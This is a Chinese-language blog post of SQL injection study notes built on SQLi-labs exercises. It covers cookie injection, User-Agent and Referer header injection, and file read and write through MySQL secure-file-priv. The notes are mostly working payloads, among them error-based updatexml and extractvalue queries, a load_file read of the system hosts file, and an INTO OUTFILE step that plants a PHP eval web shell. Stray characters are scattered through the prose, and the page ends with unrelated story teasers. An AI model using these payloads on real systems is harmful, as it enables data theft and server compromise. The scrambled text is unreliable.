2022-07-05 其他注入手法

寬字節(jié)注入

Cookie注入

? ? 使用靶場SQLi-labs 第20關(guān)字支;

? ? cookie注入的注入?yún)?shù)需要通過cookie提交,可以通過【document.cookie】在控制臺完成對瀏覽器cookie的讀寫砍艾。

? ? 方法一码耐、在控制臺輸入:

? ? document.cookie="uname=Dumb' and extractvalue(1,concat(0x5e,version(),0x5e))#"

? ? 方法二、通過bp抓包

? ? 在使用dump用戶登錄前后檀夹,分別使用bp進(jìn)行抓包筋粗,經(jīng)過對兩個(gè)數(shù)據(jù)包的對比,分析出登錄用戶后出現(xiàn)cookie字段炸渡,經(jīng)過對cookie字段中uname=Dumb進(jìn)行注入娜亿,發(fā)現(xiàn)可以進(jìn)行報(bào)錯(cuò)注入。

? ? uname=dumb' and updatexml(1,concat(0x5e,(select version(),0x5e)),1)

http頭部注入

? ? http頭部注入就是指注入http頭部報(bào)文字段蚌堵,這些字段通常有user-agent买决、referer等。

? ? @? ? user-agent注入

? ? 如第18關(guān)

? ? user-agent:hacker' and updatexml(1,concat(0x5e,database(),0x5e),1) and '1'='1

? ? @? ? referer注入

? ? 第19關(guān)吼畏,注入字段referer

? ??hacker' and updatexml(1,concat(0x5e,database(),0x5e),1) and '1'='1

secure-file-priv注入

@前提

? ? 我們可以利用SQL注入漏洞讀寫文件督赤,但是讀寫文件需要一定的條件。

? ?1泻蚊、secure-file-priv

? ? 可以再phpmyadmin中看到該變量躲舌。

? ? 該參數(shù)再高版本的mysql數(shù)據(jù)庫中限制了文件的導(dǎo)入導(dǎo)出操做。改變該參數(shù)可以再my.ini配置文件中修改性雄,然后重啟mysql服務(wù)没卸。

? ? 關(guān)于該參數(shù)值得相關(guān)說明

? ? secure-file-priv=空? ? ? ? 不對mysql服務(wù)的導(dǎo)入導(dǎo)出做出限制

? ? secure-file-priv='c:/a/'? ? 限制mysql服務(wù)的導(dǎo)入導(dǎo)出操做發(fā)生在c:/a/下(子目錄有效)

? ? secure-file-priv=null? ? ? ? 限制mysql服務(wù)不允許導(dǎo)入導(dǎo)出操做

? ? 2、當(dāng)前用戶具有文件權(quán)限

? ? 查詢語句:select File_priv from mysql.user where user="root" and host="localhost"

? ? 3秒旋、要知道寫入目標(biāo)文件的絕對路徑

? ? @讀取文件

? ? ?id=-1' union select 1,load_file('C:\\Windows\\System32\\drivers\\etc\\hosts'),3 --+

? ? @寫入文件

? ? ?id=1' and 1=2 union select 1,'<?php @eval($_REQUEST[111]);?>',3 into outfile 'c:\\phpstudy\\www\\1.php' --+

? ? 直接傳入?yún)?shù)约计,頁面如果不報(bào)錯(cuò)說明寫入成功,可以直接訪問寫入文件

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末滩褥,一起剝皮案震驚了整個(gè)濱河市病蛉,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌,老刑警劉巖铺然,帶你破解...
    沈念sama閱讀 217,509評論 6 504
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件俗孝,死亡現(xiàn)場離奇詭異,居然都是意外死亡魄健,警方通過查閱死者的電腦和手機(jī)赋铝,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,806評論 3 394
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來沽瘦,“玉大人革骨,你說我怎么就攤上這事∥隽担” “怎么了良哲?”我有些...
    開封第一講書人閱讀 163,875評論 0 354
  • 文/不壞的土叔 我叫張陵,是天一觀的道長助隧。 經(jīng)常有香客問我筑凫,道長,這世上最難降的妖魔是什么并村? 我笑而不...
    開封第一講書人閱讀 58,441評論 1 293
  • 正文 為了忘掉前任巍实,我火速辦了婚禮,結(jié)果婚禮上哩牍,老公的妹妹穿的比我還像新娘棚潦。我一直安慰自己,他們只是感情好膝昆,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,488評論 6 392
  • 文/花漫 我一把揭開白布丸边。 她就那樣靜靜地躺著,像睡著了一般外潜。 火紅的嫁衣襯著肌膚如雪原环。 梳的紋絲不亂的頭發(fā)上挠唆,一...
    開封第一講書人閱讀 51,365評論 1 302
  • 那天处窥,我揣著相機(jī)與錄音,去河邊找鬼玄组。 笑死滔驾,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的俄讹。 我是一名探鬼主播哆致,決...
    沈念sama閱讀 40,190評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼,長吁一口氣:“原來是場噩夢啊……” “哼患膛!你這毒婦竟也來了摊阀?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,062評論 0 276
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎胞此,沒想到半個(gè)月后臣咖,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,500評論 1 314
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡漱牵,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,706評論 3 335
  • 正文 我和宋清朗相戀三年夺蛇,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片酣胀。...
    茶點(diǎn)故事閱讀 39,834評論 1 347
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡刁赦,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出闻镶,到底是詐尸還是另有隱情甚脉,我是刑警寧澤,帶...
    沈念sama閱讀 35,559評論 5 345
  • 正文 年R本政府宣布铆农,位于F島的核電站宦焦,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏顿涣。R本人自食惡果不足惜波闹,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,167評論 3 328
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望涛碑。 院中可真熱鬧精堕,春花似錦、人聲如沸蒲障。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,779評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽揉阎。三九已至庄撮,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間毙籽,已是汗流浹背洞斯。 一陣腳步聲響...
    開封第一講書人閱讀 32,912評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留坑赡,地道東北人烙如。 一個(gè)月前我還...
    沈念sama閱讀 47,958評論 2 370
  • 正文 我出身青樓,卻偏偏與公主長得像毅否,于是被迫代替她去往敵國和親亚铁。 傳聞我的和親對象是個(gè)殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,779評論 2 354

推薦閱讀更多精彩內(nèi)容

  • 本文是關(guān)于SQL各種類型數(shù)據(jù)庫的注入攻擊自我復(fù)習(xí)總結(jié)螟加,如果文中有不足的地方徘溢,麻煩大佬在評論中指出或者私聊我吞琐,謝謝~...
    白面安全猿閱讀 880評論 0 1
  • 數(shù)據(jù)與代碼分離 盲注:沒有錯(cuò)誤回顯 or 返回頁面無差異 基于時(shí)間的盲注: 五種時(shí)間盲注[https://xz.a...
    一碗海鮮湯閱讀 601評論 0 1
  • information_schema表的構(gòu)造 information_schema表存儲(chǔ)了數(shù)據(jù)庫、表然爆、列的結(jié)構(gòu)信息...
    IOT深海閱讀 310評論 0 0
  • sql注入的防御方法:1.對輸入的sql語句進(jìn)行過濾或者轉(zhuǎn)義2.使用waf3.數(shù)據(jù)庫預(yù)編譯(在根源上杜絕)http...
    皮蛋是個(gè)臭蛋閱讀 650評論 0 0
  • 前言 實(shí)習(xí)電話面的時(shí)候顽分,問到了sql注入的利用,我扒拉扒拉一大堆施蜜,結(jié)果腦子一抽卒蘸,說Mysql注入不支持堆疊注入 我...
    book4yi閱讀 1,095評論 0 2